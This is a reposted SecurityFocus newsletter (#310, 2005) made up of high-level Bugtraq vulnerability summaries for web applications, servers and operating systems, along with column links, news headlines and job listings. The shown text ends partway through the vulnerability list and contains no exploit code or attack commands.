Home
Systeembeheer
Consultancy
Connectivity
Training
Development

Klanten

Inloggen

Resources

Sans artikelen
Security artikelen

Software

Linux
Windows









[ terug ]
SecurityFocus Newsletter #310
----------------------------------------

This Issue is Sponsored By: CrossTec

NetOp Desktop Firewall & Policy Server lets you centrally manage which
applications can run on your enterprise PCs.  NetOp's tiny driver-centric design
prevents unauthorized programs and processes, including viruses, keyloggers,
spyware and more from executing -- without slowing down your systems. The future
of endpoint protection is available today. Try it FREE.

http://www.securityfocus.com/sponsor/CrossTec_sf-news_050726

------------------------------------------------------------------
I.    FRONT AND CENTER
       1. Greasing the wheel with Greasemonkey
       2. Security still underfunded
       3. Windows Syscall Shellcode
II.   BUGTRAQ SUMMARY
       1. Kayako LiveResponse Multiple Input Validation Vulnerabilities
       2. PluggedOut CMS Multiple Input Validation Vulnerabilities
       3. PC-Experience/Toppe Unauthorized User Access Vulnerability
       4. PC-Experience/Toppe PM.PHP MSG Parameter Cross-Site Scripting
Vulnerability
       5. Ragnarok Online Control Panel Authentication Bypass Vulnerability
       6. NetCPlus BusinessMail Multiple Remote Buffer Overflow Vulnerabilities
       7. Jabber Studio JabberD Multiple Remote Buffer Overflow Vulnerabilities
       8. MySQL Eventum Multiple Cross-Site Scripting Vulnerabilities
       9. MySQL Eventum Multiple SQL Injection Vulnerabilities
       10. ChurchInfo Multiple SQL Injection Vulnerabilities
       11. PHPFreeNews Multiple Cross Site Scripting Vulnerabilities
       12. AderSoftware CFBB Index.CFM Cross-Site Scripting Vulnerability
       13. No-Brainer SMTP Client Log_Msg() Remote Format String Vulnerability
       14. PHPFreeNews Admin Login SQL Injection Vulnerability
       15. OpenBook Admin.PHP SQL Injection Vulnerability
       16. Apple Mac OS X Font Book Font Collection Buffer Overflow
Vulnerability
       17. Trend Micro OfficeScan POP3 Module Shared Section Insecure
Permissions Vulnerability
       18. Shiny Entertainment Sacrifice Remote Arbitrary Code Execution
Vulnerabilities
       19. Info-ZIP UnZip CHMod File Permission Modification Race Condition
Weakness
       20. Pablo Software Solutions Quick 'n Easy FTP Server User Command Denial
of Service Vulnerability
       21. nCipher CHIL Random Cache Leakage Vulnerability
       22. Computer Associates BrightStor ARCserve Backup Remote Buffer Overflow
Vulnerability
       23. Naxtor Shopping Cart Lost_password.PHP Cross Site Scripting
Vulnerability
       24. Metasploit Framework MSFWeb Defanged Mode Restriction Bypass
Vulnerability
       25. Naxtor Shopping Cart Shop_Display_Products.PHP SQL Injection
Vulnerability
       26. Microsoft ActiveSync Network Synchronization Multiple Vulnerabilities
       27. ProRat Server Remote Buffer Overflow Vulnerability
       28. Debian Apt-Cacher Remote Command Execution Vulnerability
       29. Fusebox Index.CFM Cross-Site Scripting Vulnerability
       30. Symantec Norton GoBack Local Authentication Bypass Vulnerability
       31. GXT Editor Buffer Overflow Vulnerability
       32. Karrigell KS File Arbitrary Python Command Execution Vulnerability
       33. Web Content Management Multiple Cross-Site Scripting Vulnerabilities
       34. Web Content Management Administrator Account Unauthorized Access
Vulnerability
       35. Silvernews Admin.PHP SQL Injection Vulnerability
       36. Linux Kernel Stack Fault Exceptions Unspecified Local Denial of
Service Vulnerability
       37. Naxtor E-directory Message.ASP Cross Site Scripting Vulnerability
       38. Naxtor E-directory Default.ASP SQL Injection Vulnerability
       39. Linux Kernel NFSACL Protocol XDR Data Remote Denial of Service
Vulnerability
       40. Denora IRC Stats Remote Buffer Overflow Vulnerability
       41. LogiCampus Helpdesk Unspecified Cross Site Scripting Vulnerability
       42. NetworkActiv Web Server Cross-Site Scripting Vulnerability
       43. PortailPHP Index.PHP SQL Injection Vulnerability
       44. McDATA E/OS Remote Denial Of Service Vulnerability
       45. Microsoft August Advance Notification Unspecified Security
Vulnerabilities
       46. Linux Kernel XFRM Array Index Buffer Overflow Vulnerability
       47. Comdev ECommerce Config.PHP Remote File Include Vulnerability
       48. Comdev eCommerce WCE.Download.PHP Directory Traversal Vulnerability
       49. Microsoft Windows Unspecified Remote Arbitrary Code Execution
Vulnerability
       50. Jax PHP Scripts Multiple Cross-Site Scripting Vulnerabilities
       51. Jax PHP Scripts Multiple Remote Information Disclosure
Vulnerabilities
       52. FlatNuke Multiple Cross Site Scripting Vulnerabilities
       53. PHPOpenChat Multiple HTML Injection Vulnerabilities
       54. FlatNuke User Data Arbitrary PHP Code Execution Vulnerability
       55. Lantronix Secure Console Server SCS820/SCS1620 Multiple Local
Vulnerabilities
       56. EMC Navisphere Manager Directory Traversal And Information Disclosure
Vulnerabilities
       57. Acunetix Web Vulnerability Scanner Remote Denial of Service
Vulnerability
       58. PHP-Fusion Messages.PHP SQL Injection Vulnerability
III.  SECURITYFOCUS NEWS
       1. Microsoft's "monkeys" find first zero-day exploit
       2. Annual hacking game teaches security lessons
       3. Exploit writers team up to target Cisco routers
       4. Reading, rooting, 'rithmetic: Preschoolers learn programming
       5. ID theft automated using keylogger Trojan
       6. Former 'Spam King' pays MS $7m to settle lawsuit
       7. Microsoft quells Vista virus concerns
       8. OS exploits are 'old hat'
IV.   SECURITY JOBS LIST SUMMARY
       1. [SJ-JOB] Account Manager, Reston, VA
       2. [SJ-JOB] Director, Information Security, Portland
       3. [SJ-JOB] Application Security Architect, Amsterdam
       4. [SJ-JOB] Sr. Security Analyst, Fredericton
       5. [SJ-JOB] Forensics Engineer, London
       6. [SJ-JOB] Security Consultant, Bern, Lausanne or Zurich
       7. [SJ-JOB] Security Consultant, Munich or Frankfurt
       8. [SJ-JOB] Compliance Officer, M4 Corridor
       9. [SJ-JOB] Security Consultant, Grapevine
       10. [SJ-JOB] Security Engineer, Milpitas
       11. [SJ-JOB] Application Security Architect, Bern, Lausanne or Zurich
       12. [SJ-JOB] Security Consultant, Bristol
       13. [SJ-JOB] Developer, Boulder
       14. [SJ-JOB] Developer, Boulder
       15. [SJ-JOB] Security System Administrator, Albany
       16. [SJ-JOB] Security System Administrator, Albany
       17. [SJ-JOB] Account Manager, Seattle
       18. [SJ-JOB] Manager, Information Security, Boston
       19. [SJ-JOB] Security Consultant, Maidenhead, Berkshire
       20. [SJ-JOB] Sr. Security Analyst, Buffalo
       21. [SJ-JOB] Chief Security Strategist, Los Angeles
       22. [SJ-JOB] Manager, Information Security, Oklahoma City
       23. [SJ-JOB] Technology Risk Consultant, CHicago
       24. [SJ-JOB] Sr. Security Analyst, Sterling
       25. [SJ-JOB] Manager, Information Security, Buffalo
       26. [SJ-JOB] Forensics Engineer, Countrywide
       27. [SJ-JOB] Security Consultant, New York
       28. [SJ-JOB] Manager, Information Security, Boston
       29. [SJ-JOB] Security Engineer, Boston
       30. [SJ-JOB] Security Engineer, Los Angeles
       31. [SJ-JOB] Security Consultant, Pennsylvania
       32. [SJ-JOB] Security Consultant, New Jersey
       33. [SJ-JOB] Security Consultant, California
       34. [SJ-JOB] Sales Representative, Atlanta
       35. [SJ-JOB] Security Consultant, Connecticut
       36. [SJ-JOB] Sales Engineer, New York
       37. [SJ-JOB] Sales Engineer, El Segundo
       38. [SJ-JOB] Compliance Officer, Warren
       39. [SJ-JOB] Security Engineer, Edison
       40. [SJ-JOB] Evangelist, Dallas
       41. [SJ-JOB] Security Engineer, Chantilly
       42. [SJ-JOB] Security Architect, Santa Ana
       43. [SJ-JOB] Account Manager, California
       44. [SJ-JOB] Security System Administrator, Atlanta
       45. [SJ-JOB] Sales Representative, Dallas
       46. [SJ-JOB] Sales Representative, Atlanta
       47. [SJ-JOB] Technical Support Engineer, Atlanta
       48. [SJ-JOB] Sales Representative, Atlanta
       49. [SJ-JOB] Sales Representative, Atlanta
       50. [SJ-JOB] Developer, Atlanta
       51. [SJ-JOB] Sales Representative, Atlanta
       52. [SJ-JOB] Security System Administrator, Springfield
       53. [SJ-JOB] Application Security Engineer, New York City
       54. [SJ-JOB] Security Researcher, El Sugundo
       55. [SJ-JOB] Jr. Security Analyst, Redwood City
       56. [SJ-JOB] Management, Chantilly
       57. [SJ-JOB] Sr. Security Analyst, Atlanta  (downtown)
       58. [SJ-JOB] Security Engineer, Sunnyvale
       59. [SJ-JOB] Sales Engineer, Dallas
       60. [SJ-JOB] Sales Engineer, Washington Metro Area
       61. [SJ-JOB] Compliance Officer, Miami
       62. [SJ-JOB] Security System Administrator, Western Kansas
       63. [SJ-JOB] Security Consultant, New York
       64. [SJ-JOB] Sales Engineer, Singapore
       65. [SJ-JOB] Security Consultant, Cambridge
       66. [SJ-JOB] Security Architect, Portland
       67. [SJ-JOB] Sr. Security Engineer, Islandia
       68. [SJ-JOB] Sr. Security Engineer, Bethesda
       69. [SJ-JOB] Sr. Security Engineer, Austin
       70. [SJ-JOB] Security Researcher, Austin
       71. [SJ-JOB] VP / Dir / Mgr engineering, Washington
       72. [SJ-JOB] Security Consultant, Boisbriand
       73. [SJ-JOB] Sr. Security Analyst, central
       74. [SJ-JOB] VP / Dir / Mgr engineering, Pune
       75. [SJ-JOB] Quality Assurance, Cupertino
       76. [SJ-JOB] Technical Marketing Engineer, Cupertino
       77. [SJ-JOB] Security System Administrator, Appleton
V.    INCIDENTS LIST SUMMARY
VI.   VULN-DEV RESEARCH LIST SUMMARY
VII.  MICROSOFT FOCUS LIST SUMMARY
       1. IEEE 802.1x & EAP-TLS design based on Windows 2000 Server
       2. SecurityFocus Microsoft Newsletter #250
VIII. SUN FOCUS LIST SUMMARY
       1. Securing Solaris 10
       2. Accessing Solaris 10 Local Zones from the Global Zone, security risk
IX.   LINUX FOCUS LIST SUMMARY
X.    BOOK EXCERPTS
XI.   UNSUBSCRIBE INSTRUCTIONS
XII.  SPONSOR INFORMATION

I.   FRONT AND CENTER
---------------------
1. Greasing the wheel with Greasemonkey
By Scott Granneman
If blogging is enjoyable because it allows us to watch an interesting mind at
work, then Jon Udell's blog is definitely among the most enjoyable.
http://www.securityfocus.com/columnists/346

2. Security still underfunded
By Kelly Martin
Blackhat is one of my favorite places to do some casual online banking over an
insecure WiFi connection. Where's the risk, right?
http://www.securityfocus.com/columnists/345

3. Windows Syscall Shellcode
By Piotr Bania
This article has been written to show that is possible to write shellcode for
Windows operating systems that doesn't use standard API calls at all.
http://www.securityfocus.com/infocus/1844


II.  BUGTRAQ SUMMARY
--------------------
1. Kayako LiveResponse Multiple Input Validation Vulnerabilities
BugTraq ID: 14425
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14425
Summary:
Kayako LiveResponse is prone to multiple cross-site scripting, SQL injection,
and HTML injection vulnerabilties.  These issues are all related to input
validation errors.

The cross-site scripting and HTML injection vulnerabilities may allow for theft
of cookie-based authentication credentials or other attacks.  The SQL injection
vulnerabilities may permit a remote attacker to compromise the software or
launch attacks other attacks against the database.

2. PluggedOut CMS Multiple Input Validation Vulnerabilities
BugTraq ID: 14426
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14426
Summary:
PluggedOut CMS is prone to multiple cross-site scripting and SQL injection
vulnerabilities.

Exploitation could allow for theft of cookie-based authentication credentials or
unauthorized access to database data.  Other attacks are also possible.


3. PC-Experience/Toppe Unauthorized User Access Vulnerability
BugTraq ID: 14427
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14427
Summary:
PC-Experience and Toppe may let remote attackers gain unauthorized access to
arbitrary user accounts.  This is due to an access validation error related to
cookie authentication.

4. PC-Experience/Toppe PM.PHP MSG Parameter Cross-Site Scripting Vulnerability
BugTraq ID: 14428
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14428
Summary:
PC-Experience and Toppe are prone to cross-site scripting attacks.  This may let
a remote attacker gain access to cookie-based authentications of other
PC-Experience/Toppe users.


5. Ragnarok Online Control Panel Authentication Bypass Vulnerability
BugTraq ID: 14429
Remote: Yes
Date Published: 2005-07-30
Relevant URL: http://www.securityfocus.com/bid/14429
Summary:
Ragnarok Online Control Panel (ROCP) is prone to a vulnerability that may let
remote attackers bypass user authentication.  This issue is related to how PHP
variables are handled, letting an attacker influence a variable that is used to
check user authentication.

Exploitation could yield administrative access to the ROCP site.

This issue may be exclusive to sites hosting ROCP with Apache Web server.  This
has not been confirmed.

6. NetCPlus BusinessMail Multiple Remote Buffer Overflow Vulnerabilities
BugTraq ID: 14434
Remote: Yes
Date Published: 2005-07-31
Relevant URL: http://www.securityfocus.com/bid/14434
Summary:
BusinessMail is affected by multiple remote buffer overflow vulnerabilities.  
These issues arise due to a lack of boundary checks performed by the application
and may allow remote attackers to execute machine code in the context of the
server process. 

BusinessMail 4.60 is reportedly vulnerable.  Other versions may be affected as
well.

7. Jabber Studio JabberD Multiple Remote Buffer Overflow Vulnerabilities
BugTraq ID: 14435
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14435
Summary:
Jabber Studio jabberd is affected by multiple remote buffer overflow
vulnerabilities.

An attacker may leverage these issues to execute arbitrary code on a computer
with the privileges of the server process. This may facilitate unauthorized
access or privilege escalation.

2.0s8 and prior versions of jabberd are affected by these issues.


8. MySQL Eventum Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 14436
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14436
Summary:
MySQL Eventum is prone to multiple cross-site scripting vulnerabilities.  These
issues are due to a failure in the application to properly sanitize
user-supplied input.

An attacker may leverage any of these issues to have arbitrary script code
executed in the browser of an unsuspecting user in the context of the affected
site.  This may facilitate the theft of cookie-based authentication credentials
as well as other attacks.

9. MySQL Eventum Multiple SQL Injection Vulnerabilities
BugTraq ID: 14437
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14437
Summary:
MySQL Eventum is prone to multiple SQL injection vulnerabilities.  These issues
are due to a failure in the application to properly sanitize user-supplied input
before using it in SQL queries.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

10. ChurchInfo Multiple SQL Injection Vulnerabilities
BugTraq ID: 14438
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14438
Summary:
ChurchInfo is prone to Multiple SQL injection vulnerabilities.  These issues are
due to a failure in the application to properly sanitize user-supplied input
before using it in SQL queries.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

11. PHPFreeNews Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 14439
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14439
Summary:
PHPFreeNews is prone to multiple cross-site scripting vulnerabilities.  These
issues are due to a failure in the application to properly sanitize
user-supplied input.

An attacker may leverage these issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  These
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.


12. AderSoftware CFBB Index.CFM Cross-Site Scripting Vulnerability
BugTraq ID: 14440
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14440
Summary:
CFBB is prone to a cross-site scripting vulnerability.  This issue is due to a
failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.

This issue affects CFBB version 1.1.0; other versions may also be vulnerable.

13. No-Brainer SMTP Client Log_Msg() Remote Format String Vulnerability
BugTraq ID: 14441
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14441
Summary:
A remote format string vulnerability affects the message logging functionality
of nbSMTP. This issue is due to a failure of the application to properly
sanitize user-supplied input prior to passing it as the format specifier to a
formatted printing function.

A remote attacker may leverage this issue to write to arbitrary process memory,
facilitating code execution.

14. PHPFreeNews Admin Login SQL Injection Vulnerability
BugTraq ID: 14442
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14442
Summary:
PHPFreeNews is prone to an SQL injection vulnerability.  This issue is due to a
failure in the application to properly sanitize user-supplied input before using
it in an SQL query.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.


15. OpenBook Admin.PHP SQL Injection Vulnerability
BugTraq ID: 14444
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14444
Summary:
OpenBook is prone to an SQL injection vulnerability.  This issue is due to a
failure in the application to properly sanitize user-supplied input before using
it in an SQL query.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.


16. Apple Mac OS X Font Book Font Collection Buffer Overflow Vulnerability
BugTraq ID: 14445
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14445
Summary:
Apple Font Book is prone to a buffer overflow vulnerability. This issue is
exposed when the application handles font collection files. The vulnerability is
due to insufficient bounds checking in user-supplied data contained in font
collection bundles, causing an internal buffer to be overrun and memory
corruption to occur. As these files may originate from an external source, this
issue is considered remotely exploitable.  

The application may be a default handler for these files, making it possible to
exploit this issue through a malicious Web page or other means.

If the vulnerability is successfully exploited, it may result in execution of
arbitrary code in the context of the user running the application.

17. Trend Micro OfficeScan POP3 Module Shared Section Insecure Permissions
Vulnerability
BugTraq ID: 14448
Remote: No
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14448
Summary:
Trend Micro OfficeScan pop3 module utilizes Shared Sections in an insecure
manner.

Attackers may read the data stored in the affected memory region, gaining access
to potentially sensitive information. They may also write arbitrary data to the
shared memory segment.

By writing data to this region, they may alter the message that is displayed to
the user when the pop3 module intercepts malware in email. This may be utilized
in social engineering attacks.

This vulnerability may possibly be exploited to crash the OfficeScan service, or
potentially execute arbitrary machine code with System level privileges. This
has not been confirmed.

This vulnerability is reported in version 5.58 of OfficeScan. Other versions may
also be affected.

18. Shiny Entertainment Sacrifice Remote Arbitrary Code Execution
Vulnerabilities
BugTraq ID: 14449
Remote: Yes
Date Published: 2005-08-01
Relevant URL: http://www.securityfocus.com/bid/14449
Summary:
Sacrifice is affected by multiple remote arbitrary code execution
vulnerabilities.  These issues include a remote buffer overflow and a remote
format string vulnerability.

An attacker may leverage these issues to execute arbitrary code in the context
of the application to gain unauthorized access.

Sacrifice patch #3 and prior versions are affected by these issues.

19. Info-ZIP UnZip CHMod File Permission Modification Race Condition Weakness
BugTraq ID: 14450
Remote: No
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14450
Summary:
Info-ZIP unzip is reported prone to a security weakness; the issue is only
present when an archive is extracted into a world or group writable directory.
It is reported that unzip employs non-atomic procedures to write a file and
later change the permissions on the newly extracted file.

A local attacker may leverage this issue to modify file permissions of target
files.


20. Pablo Software Solutions Quick 'n Easy FTP Server User Command Denial of
Service Vulnerability
BugTraq ID: 14451
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14451
Summary:
Quick 'n Easy FTP Server is prone to a remotely exploitable denial of service
vulnerability.  This may be triggered by a client through an overly long
argument for the USER command.

Successful exploitation may lead to a crash due to resource exhaustion.

This issue was originally identified as a buffer overflow vulnerability.  Due to
the availability of more details, it is being changed to a denial of service
vulnerability.

21. nCipher CHIL Random Cache Leakage Vulnerability
BugTraq ID: 14452
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14452
Summary:
nCipher CHIL library is affected by a random cache leakage vulnerability.  

This issue arises when a program attempts to obtain random bytes from an nCipher
hardware module.  If the program calling the library forks, the child processes
will inherit the identical randomness cache as the parent.

This impact of this issue depends on the type of application that forks and uses
CHIL to generate random data.  Denial of service conditions in Web servers due
to the failure of SSL handshakes and other attacks may be possible.

Applications that fork and use CHIL directly or through OpenSSL are vulnerable
to this issue.  OpenSSL 0.9.6-ENGINE and 0.9.7 use CHIL for random number
generation (via RAND_bytes or RAND_pseudo_bytes) if the "chil" engine is
enabled. 

22. Computer Associates BrightStor ARCserve Backup Remote Buffer Overflow
Vulnerability
BugTraq ID: 14453
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14453
Summary:
Computer Associates BrightStor ARCserve Backup and BrightStor Enterprise Backup
Agents for Windows are affected by a remote stack-based buffer overflow
vulnerability.  This issue is due to a failure of the application to perform
proper bounds checking on data supplied to the application.

A remote attacker may exploit this issue to execute arbitrary code on a
vulnerable computer with SYSTEM privileges. A denial of service condition may
arise as well.


23. Naxtor Shopping Cart Lost_password.PHP Cross Site Scripting Vulnerability
BugTraq ID: 14454
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14454
Summary:
Naxtor Shopping Cart is prone to a cross-site scripting vulnerability.  This
issue is due to a failure in the application to properly sanitize user-supplied
input.

An attacker may leverage this issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.


24. Metasploit Framework MSFWeb Defanged Mode Restriction Bypass Vulnerability
BugTraq ID: 14455
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14455
Summary:
Metasploit Framework is susceptible to a restriction bypass vulnerability in
msfweb. This issue is due to a failure of the application to properly implement
access control restrictions.

This issue allows remote attackers to bypass security restrictions in the
affected Web server. Attackers may exploit this issue to attack arbitrary
computers using the Metasploit Framework, while originating the attacks from the
computer hosting the vulnerable msfweb process.

Attackers may also interact with the payload features in the Metasploit
Framework to manipulate files on the hosting computer, likely leading to
executing arbitrary commands and then complete system compromise.

It should be noted that the Metasploit Framework documentation specifies that
msfweb should not be globally accessible, due to potential security problems.

25. Naxtor Shopping Cart Shop_Display_Products.PHP SQL Injection Vulnerability
BugTraq ID: 14456
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14456
Summary:
Naxtor Shopping Cart is prone to an SQL injection vulnerability.  This issue is
due to a failure in the application to properly sanitize user-supplied input
before using it in an SQL query.

Successful exploitation could result in a compromise of the application,
disclosure or modification of data, or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.

26. Microsoft ActiveSync Network Synchronization Multiple Vulnerabilities
BugTraq ID: 14457
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14457
Summary:
Several specific issues have been identified with the network synchronization
protocol used by Microsoft ActiveSync.

The first issue is the use of cleartext communications for all network traffic. 

The second issue is the lack of password authentication.

The third issue is an information disclosure issue when attempting to initiate
network synchronization.

The last issue is a denial of service vulnerability.

These issues combine to allow remote attackers to gain access to potentially
sensitive information, aiding them in further attacks. Attackers may also alter
or destroy data by simulating the synchronization protocol, or crash the
ActiveSync service.

27. ProRat Server Remote Buffer Overflow Vulnerability
BugTraq ID: 14458
Remote: Yes
Date Published: 2005-08-02
Relevant URL: http://www.securityfocus.com/bid/14458
Summary:
ProRat Server is affected by a remote buffer overflow vulnerability.

A successful attack can result in overflowing a finite sized buffer and
ultimately leading to arbitrary code execution in the context of the affected
process.  This may allow the attacker to gain elevated privileges.

28. Debian Apt-Cacher Remote Command Execution Vulnerability
BugTraq ID: 14459
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14459
Summary:
apt-cacher is prone to a remote command execution vulnerability.

Specifically, the vulnerability can allow remote attackers to execute arbitrary
commands on a computer that is acting as a caching host with the privileges of
'www-data'.

This may allow an attacker to gain unauthorized access to a vulnerable computer.

29. Fusebox Index.CFM Cross-Site Scripting Vulnerability
BugTraq ID: 14460
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14460
Summary:
Fusebox is prone to a cross-site scripting vulnerability.  This issue is due to
a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.

This issue reportedly affects Fusebox version 4.1.0; other versions may also be
vulnerable.

This issue is not believed to exist because the product does not ship with
layout configuration files; this has not been confirmed by Symantec.

30. Symantec Norton GoBack Local Authentication Bypass Vulnerability
BugTraq ID: 14461
Remote: No
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14461
Summary:
Norton GoBack is prone to a local authentication bypass vulnerability.

A successful attack causes the application to accept an arbitrary password value
and allow an attacker to make various configuration changes.  Other attacks may
be possible as well.

Symantec is currently investigating this issue.  This BID will be updated when
further analysis is complete.

31. GXT Editor Buffer Overflow Vulnerability
BugTraq ID: 14462
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14462
Summary:
GXT Editor is affected by a buffer overflow vulnerability.  This issue is due to
a failure in the application to perform proper bounds checking on user-supplied
data.

A successful attack can result in overflowing a finite sized buffer and
ultimately leading to arbitrary code execution in the context of the affected
application.

32. Karrigell KS File Arbitrary Python Command Execution Vulnerability
BugTraq ID: 14463
Remote: Yes
Date Published: 2005-07-31
Relevant URL: http://www.securityfocus.com/bid/14463
Summary:
Karrigell is susceptible to an arbitrary Python command execution vulnerability.
This issue is due to a design flaw that allows remote attackers to execute
Python commands that they are not intended to have access to.

Attackers may exploit this vulnerability to execute arbitrary Python commands in
the context of the Web server hosting the Karrigell framework. This allows
remote malicious users to cause denial of service conditions, create or
overwrite arbitrary files, and likely compromise the hosting computer.

33. Web Content Management Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 14464
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14464
Summary:
Web content management is prone to multiple cross-site scripting
vulnerabilities.  These issues are due to a failure in the application to
properly sanitize user-supplied input.

An attacker may leverage any of these issues to have arbitrary script code
executed in the browser of an unsuspecting user in the context of the affected
site.  This may facilitate the theft of cookie-based authentication credentials
as well as other attacks.

34. Web Content Management Administrator Account Unauthorized Access
Vulnerability
BugTraq ID: 14465
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14465
Summary:
Web content management is prone to an unauthorized access vulnerability.  This
issue is due to a failure in the application to ensure proper access to
administrative functions.

An attacker can exploit this vulnerability to access the vulnerable application
with full administrative privileges.  This may also aid in further attacks
against the underlying system; other attacks are also possible.

35. Silvernews Admin.PHP SQL Injection Vulnerability
BugTraq ID: 14466
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14466
Summary:
Silvernews is prone to an SQL injection vulnerability. This issue is due to
insufficient sanitization of user input.

Compromise of this application may be achieved by using SQL injection techniques
to bypass the admin login process. 


36. Linux Kernel Stack Fault Exceptions Unspecified Local Denial of Service
Vulnerability
BugTraq ID: 14467
Remote: No
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14467
Summary:
Linux kernel is reported prone to an unspecified local denial of service
vulnerability.

It was reported that this issue arises when a local user triggers stack fault
exceptions. A local attacker may exploit this issue to carry out a denial of
service attack against a vulnerable computer by crashing the kernel.


37. Naxtor E-directory Message.ASP Cross Site Scripting Vulnerability
BugTraq ID: 14468
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14468
Summary:
Naxtor E-directory is prone to a cross-site scripting vulnerability.

This issue is due to a failure in the application to properly sanitize
user-supplied input. 

An attacker can exploit this vulnerability to inject html and script code into
the Web browser of an unsuspecting victim.The attacker may then steal
cookie-based authentication credentials. Other attacks are also possible.


38. Naxtor E-directory Default.ASP SQL Injection Vulnerability
BugTraq ID: 14469
Remote: Yes
Date Published: 2005-08-03
Relevant URL: http://www.securityfocus.com/bid/14469
Summary:
Naxtor E-directory is prone to an SQL injection vulnerability. This issue is due
to a failure in the application to properly sanitize user-supplied input before
using it in SQL queries.

Successful exploitation results in gaining full administrative access within the
context of the affected application.

39. Linux Kernel NFSACL Protocol XDR Data Remote Denial of Service Vulnerability
BugTraq ID: 14470
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14470
Summary:
Linux Kernel is affected by a remote denial of service vulnerability when
handling XDR data for the nfsacl protocol.

Specific details about this issue were not disclosed.  It is conjectured that an
attacker crafts malformed XDR data that contains large string values to corrupt
kernel memory.

This may result in a denial of service condition.

40. Denora IRC Stats Remote Buffer Overflow Vulnerability
BugTraq ID: 14471
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14471
Summary:
Denora IRC Stats is affected by a remote buffer overflow vulnerability.

A successful attack can result in memory corruption and allow an attacker to
execute arbitrary code in the context of the application.  This may lead to
unauthorized access.

Denora IRC Stats versions prior to 1.1.0 are vulnerable to this issue.

41. LogiCampus Helpdesk Unspecified Cross Site Scripting Vulnerability
BugTraq ID: 14472
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14472
Summary:
LogiCampus is prone to a cross-site scripting vulnerability. This issue is due
to a failure in the application to properly sanitize user-supplied input. 

An attacker can exploit this vulnerability to inject html and script code into
the Web browser of an unsuspecting victim.  The attacker may then steal
cookie-based authentication credentials; other attacks are also possible.


42. NetworkActiv Web Server Cross-Site Scripting Vulnerability
BugTraq ID: 14473
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14473
Summary:
NetworkActiv Web Server is prone to a cross-site scripting vulnerability.  This
issue is due to a failure in the application to properly sanitize user-supplied
input.

An attacker may leverage this issue to have arbitrary script code executed in
the browser of an unsuspecting user in the context of the affected site.  This
may facilitate the theft of cookie-based authentication credentials as well as
other attacks.

43. PortailPHP Index.PHP SQL Injection Vulnerability
BugTraq ID: 14474
Remote: Yes
Date Published: 2005-08-04
Relevant URL: http://www.securityfocus.com/bid/14474
Summary:
Portail PHP is prone to an SQL injection vulnerability. This issue is due to a
failure in the application to properly sanitize user-supplied input before using
it in SQL queries.

